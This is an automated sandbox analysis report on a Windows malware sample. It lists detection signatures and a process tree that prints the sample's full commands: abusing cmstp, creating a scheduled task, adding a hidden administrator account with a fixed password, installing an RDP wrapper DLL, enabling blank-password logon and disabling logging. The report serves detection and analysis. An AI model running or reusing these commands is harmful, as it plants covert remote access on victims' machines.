b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2

Analysis

max time kernel
120s
max time network
128s
platform
windows7_x64
resource
win7-en-20211208
submitted
13-02-2022 11:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
Size

424KB
MD5

afeac971ffe5bab0bf3da53291b523fe
SHA1

f1686e5d05dfb82662cea2907b2e9685d6641755
SHA256

b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2
SHA512

a065544135927cd13c547faf19e0135e7ad3f84b503f99ae4f82628643aadca6eabfa3ab7025bbc9f1efce854b6114db71d63cac8ff20b789d3385f238d1cd04

Score

8^/10

discovery evasion exploit persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

j4dsucc1.exe

pid process

968 j4dsucc1.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible privilege escalation attempt 6 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exe

pid process

1768 icacls.exe
1632 takeown.exe
1060 icacls.exe
648 icacls.exe
1592 takeown.exe
1604 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.

Remote Desktop Protocol
T1076

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" reg.exe
Modifies file permissions 1 TTPs 6 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1632 takeown.exe
1060 icacls.exe
648 icacls.exe
1592 takeown.exe
1604 icacls.exe
1768 icacls.exe

pid	process
968	j4dsucc1.exe

pid	process
1768	icacls.exe
1632	takeown.exe
1060	icacls.exe
648	icacls.exe
1592	takeown.exe
1604	icacls.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"	reg.exe

pid	process
1632	takeown.exe
1060	icacls.exe
648	icacls.exe
1592	takeown.exe
1604	icacls.exe
1768	icacls.exe

Drops file in Program Files directory 2 IoCs

Processes:

j4dsucc1.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\Services\rdpwrap.ini	j4dsucc1.exe
File opened for modification	C:\Program Files\Common Files\Services\rdpwrap.dll	j4dsucc1.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1768 schtasks.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1104 taskkill.exe
Runs net.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

j4dsucc1.exe

pid process

968 j4dsucc1.exe

pid	process
1768	schtasks.exe

pid	process
1104	taskkill.exe

pid	process
968	j4dsucc1.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe

pid	process
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
Token: SeDebugPrivilege	1104	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exej4dsucc1.exe

pid	process
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
968	j4dsucc1.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.execmd.exej4dsucc1.execmd.execmd.execmd.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 1688 wrote to memory of 820	1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe	cmstp.exe
PID 1688 wrote to memory of 820	1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe	cmstp.exe
PID 1688 wrote to memory of 820	1688	b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe	cmstp.exe
PID 684 wrote to memory of 968	684	cmd.exe	j4dsucc1.exe
PID 684 wrote to memory of 968	684	cmd.exe	j4dsucc1.exe
PID 684 wrote to memory of 968	684	cmd.exe	j4dsucc1.exe
PID 684 wrote to memory of 968	684	cmd.exe	j4dsucc1.exe
PID 968 wrote to memory of 652	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 652	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 652	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 652	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 1832	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 1832	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 1832	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 1832	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 1444	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1444	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1444	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1444	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1704	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1704	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1704	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 1704	968	j4dsucc1.exe	net.exe
PID 968 wrote to memory of 852	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 852	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 852	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 852	968	j4dsucc1.exe	cmd.exe
PID 1832 wrote to memory of 1768	1832	cmd.exe	schtasks.exe
PID 1832 wrote to memory of 1768	1832	cmd.exe	schtasks.exe
PID 1832 wrote to memory of 1768	1832	cmd.exe	schtasks.exe
PID 1832 wrote to memory of 1768	1832	cmd.exe	schtasks.exe
PID 852 wrote to memory of 584	852	cmd.exe	choice.exe
PID 852 wrote to memory of 584	852	cmd.exe	choice.exe
PID 852 wrote to memory of 584	852	cmd.exe	choice.exe
PID 852 wrote to memory of 584	852	cmd.exe	choice.exe
PID 968 wrote to memory of 2028	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 2028	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 2028	968	j4dsucc1.exe	cmd.exe
PID 968 wrote to memory of 2028	968	j4dsucc1.exe	cmd.exe
PID 2028 wrote to memory of 916	2028	cmd.exe	choice.exe
PID 2028 wrote to memory of 916	2028	cmd.exe	choice.exe
PID 2028 wrote to memory of 916	2028	cmd.exe	choice.exe
PID 2028 wrote to memory of 916	2028	cmd.exe	choice.exe
PID 1704 wrote to memory of 1532	1704	net.exe	net1.exe
PID 1704 wrote to memory of 1532	1704	net.exe	net1.exe
PID 1704 wrote to memory of 1532	1704	net.exe	net1.exe
PID 1704 wrote to memory of 1532	1704	net.exe	net1.exe
PID 1444 wrote to memory of 1632	1444	net.exe	net1.exe
PID 1444 wrote to memory of 1632	1444	net.exe	net1.exe
PID 1444 wrote to memory of 1632	1444	net.exe	net1.exe
PID 1444 wrote to memory of 1632	1444	net.exe	net1.exe
PID 2028 wrote to memory of 1064	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 1064	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 1064	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 1064	2028	cmd.exe	net.exe
PID 1064 wrote to memory of 1720	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1720	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1720	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1720	1064	net.exe	net1.exe
PID 2028 wrote to memory of 1604	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 1604	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 1604	2028	cmd.exe	net.exe
PID 2028 wrote to memory of 1604	2028	cmd.exe	net.exe
PID 1604 wrote to memory of 1616	1604	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
"C:\Users\Admin\AppData\Local\Temp\b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1688

\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au c:\Users\Public\\552pku1a.inf
2⤵
PID:820

C:\Windows\system32\cmd.exe
cmd /c start c:\Users\Public\j4dsucc1.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

\??\c:\Users\Public\j4dsucc1.exe
c:\Users\Public\j4dsucc1.exe
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\SysWOW64\cmd.exe
cmd /c mkdir "C:\Program Files\Common Files\Services" & exit
3⤵
PID:652

C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f & choice /n /c y /d y /t 3 > nul & schtasks /Run /tn "lst64" & choice /n /c y /d y /t 3 > nul & schtasks /Delete /tn "lst64" /f & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f
4⤵
- Creates scheduled task(s)
PID:1768

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:948

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /tn "lst64"
4⤵
PID:1348

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1688

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn "lst64" /f
4⤵
PID:968

C:\Windows\SysWOW64\net.exe
net user "Admin" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user "Admin" "
4⤵
PID:1632

C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
3⤵
- Suspicious use of WriteProcessMemory
PID:1704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
4⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
cmd /c choice /n /c y /d y /t 30 > nul & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & net start "TermService" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 30
4⤵
PID:584

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
4⤵
PID:1056

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
4⤵
PID:1740

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1660

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
4⤵
PID:1528

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f
4⤵
PID:652

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f
4⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f
4⤵
PID:1092

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f
4⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
4⤵
PID:1196

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f
4⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
4⤵
PID:1040

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1060

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f
4⤵
PID:648

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f
4⤵
PID:1592

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:816

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f
4⤵
PID:948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f
4⤵
PID:1768

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f
4⤵
PID:1156

C:\Windows\SysWOW64\net.exe
net start "TermService"
4⤵
PID:1348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start "TermService"
5⤵
PID:788

C:\Windows\SysWOW64\cmd.exe
cmd /c choice /n /c y /d y /t 3 > nul & del /f /q "c:\Users\Public\j4dsucc1.exe" & net stop "TermService" /y & net user SysWOW64 t0or9368 /add & choice /n /c y /d y /t 3 > nul & net user SysWOW64 /active:yes & net user SysWOW64 /expires:never & choice /n /c y /d y /t 3 > nul & net user SysWOW64 /passwordchg:no & net user SysWOW64 /logonpasswordchg:no & net localgroup Administradores SysWOW64 /add & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant SysWOW64:F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administradores:F & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant SysWOW64:F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administradores:F & reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f & netsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes & choice /n /c y /d y /t 3 > nul & net localgroup "Usuarios de escritorio remoto" SysWOW64 /add & net localgroup "Usuarios de escritorio remoto" "Admin" /add & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:916

C:\Windows\SysWOW64\net.exe
net stop "TermService" /y
4⤵
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "TermService" /y
5⤵
PID:1720

C:\Windows\SysWOW64\net.exe
net user SysWOW64 t0or9368 /add
4⤵
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user SysWOW64 t0or9368 /add
5⤵
PID:1616

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:872

C:\Windows\SysWOW64\net.exe
net user SysWOW64 /active:yes
4⤵
PID:560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user SysWOW64 /active:yes
5⤵
PID:1324

C:\Windows\SysWOW64\net.exe
net user SysWOW64 /expires:never
4⤵
PID:432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user SysWOW64 /expires:never
5⤵
PID:1664

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:1320

C:\Windows\SysWOW64\net.exe
net user SysWOW64 /passwordchg:no
4⤵
PID:916

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user SysWOW64 /passwordchg:no
5⤵
PID:1908

C:\Windows\SysWOW64\net.exe
net user SysWOW64 /logonpasswordchg:no
4⤵
PID:1192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user SysWOW64 /logonpasswordchg:no
5⤵
PID:1704

C:\Windows\SysWOW64\net.exe
net localgroup Administradores SysWOW64 /add
4⤵
PID:1928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administradores SysWOW64 /add
5⤵
PID:1196

C:\Windows\SysWOW64\takeown.exe
TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1632

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant SysWOW64:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1060

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administradores:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:648

C:\Windows\SysWOW64\takeown.exe
TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1592

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant SysWOW64:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1604

C:\Windows\SysWOW64\icacls.exe
ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administradores:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1768

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f
4⤵
PID:904

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
4⤵
PID:1156

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
4⤵
PID:1348

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
4⤵
- Allows Network login with blank passwords
PID:788

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes
4⤵
PID:1324

C:\Windows\SysWOW64\choice.exe
choice /n /c y /d y /t 3
4⤵
PID:432

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" SysWOW64 /add
4⤵
PID:1172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" SysWOW64 /add
5⤵
PID:1176

C:\Windows\SysWOW64\net.exe
net localgroup "Usuarios de escritorio remoto" "Admin" /add
4⤵
PID:820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" "Admin" /add
5⤵
